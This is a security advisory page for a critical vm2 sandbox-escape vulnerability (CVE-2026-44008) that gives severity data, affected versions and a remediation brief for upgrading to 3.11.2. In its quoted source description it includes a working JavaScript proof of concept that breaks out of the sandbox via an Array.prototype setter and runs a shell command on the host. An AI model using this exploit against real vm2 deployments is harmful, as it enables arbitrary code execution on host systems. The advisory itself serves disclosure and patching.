Skip to content

← Actionable
Critical, CVSS 9.8amended

vm2 has sandbox breakout via neutralizeArraySpeciesBatch

CVE-2026-44008GHSA-9qj6-qjgg-37qq

What to do

Vendor fix available. Upgrade each affected package to the fixed version on its release line (vm2 3.11.2), redeploy, then verify what is actually installed.

This page has no inventory attached, so it cannot say whether you are affected. A vendor fix is not proof that your deployment is fixed.

Affected packages

  • npm vm2

    Affected
    < 3.11.2
    Fixed in
    3.11.2

Sources

Severity and exploitation
Exploitation
No confirmed exploitation recorded. Patch Next marks exploitation only from CISA KEV.
CVSS
9.8 · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
  • CVE-2026-44008: 0.85% estimated exploitation activity in the next 30 days; percentile 58.25 (FIRST EPSS, 2026-11-03). This is a model estimate, not proof of exploitation or customer exposure.
Source description

As published by the source; long descriptions are shortened.

Summary VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.

Details The new method `neutralizeArraySpeciesBatch` works with objects from the other side but can call into this side via getter on the array prototype exposing objects of the wrong side into the sandbox. This can be used to get host objects and get the host `Function` object.

PoC ```js const {VM} = require("vm2"); const vm = new VM(); console.log(vm.run(` const a = []; Object.defineProperty(Array.prototype, 0, { set(value) { a.f = Buffer.prototype.inspect; value.arr.f.constructor.constructor("return process")().mainModule.require('child_process').execSync('touch pwned'); } }); new Buffer(a); `)); ```

Impact Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.

Dates and revisions
Published by the source
Last modified by the source
Source last checked
  1. Revision 5 · amended ·

    Amended from osv record GHSA-9qj6-qjgg-37qq

  2. Revision 4 · amended ·

    Amended from ghsa record GHSA-9qj6-qjgg-37qq

  3. Revision 3 · amended ·

    Amended from ghsa record GHSA-9qj6-qjgg-37qq

  4. Revision 2 · amended ·

    Amended from osv record GHSA-9qj6-qjgg-37qq

  5. Revision 1 · created ·

    Published from ghsa record GHSA-9qj6-qjgg-37qq

Agent brief

Preview the exact text before you copy it. Commands are read-only suggestions; review them before running anything.

# Patch Next advisory brief: CVE-2026-44008

Advisory: vm2 has sandbox breakout via `neutralizeArraySpeciesBatch`
IDs: CVE-2026-44008, GHSA-9qj6-qjgg-37qq
Record: https://patchnext.com/advisories/cve-2026-44008 (revision 5, source checked 4 Nov 2026, 06:00 UTC)
Inventory: none attached. This brief comes from a public page and does not say whether any deployment is affected.
Severity: Critical (CVSS 9.8)
Exploitation: no confirmed exploitation recorded. Patch Next confirms exploitation only from CISA KEV.
Vendor response: Vendor fix available; fixed versions by package: vm2 3.11.2. A vendor fix does not mean a deployment is fixed.

## Affected components
- npm vm2: affected < 3.11.2; fixed in 3.11.2

## Suggested inspection (read-only)
- `npm ls vm2 --all`: lists every installed copy and version, including transitive ones. Run in the project root after `npm ci`.

## Supported action
Upgrade each affected component to a fixed version on its release line. For a transitive dependency, upgrade the parent package or add an override or constraint, then regenerate the lockfile. Redeploy every environment that ran an affected version.

## Required regression checks
- Run the test suite and a production build.
- Exercise the features that depend on vm2.
- Repeat the inspection and confirm that only fixed versions remain installed.

## Rollback considerations
- Keep the previous lockfile and deployment artifact. Rolling back reinstates the vulnerable version, so apply any documented mitigation while you fix forward.

## Unresolved questions
- Which deployments run an affected version?
- Exploitation status can change. Check again before lowering the priority.
- Mark the work resolved only after the fixed version is verified in production.

## Sources
- Verified: https://github.com/advisories/GHSA-9qj6-qjgg-37qq (GitHub-reviewed advisory GHSA-9qj6-qjgg-37qq lists affected ranges: npm vm2 >=0 <=3.11.1)
- Verified: https://osv.dev/vulnerability/GHSA-9qj6-qjgg-37qq (OSV record GHSA-9qj6-qjgg-37qq lists affected ranges: npm vm2 >=0 <3.11.2 (fixed))

Commands are suggestions: review each one before running it.

Loading voting…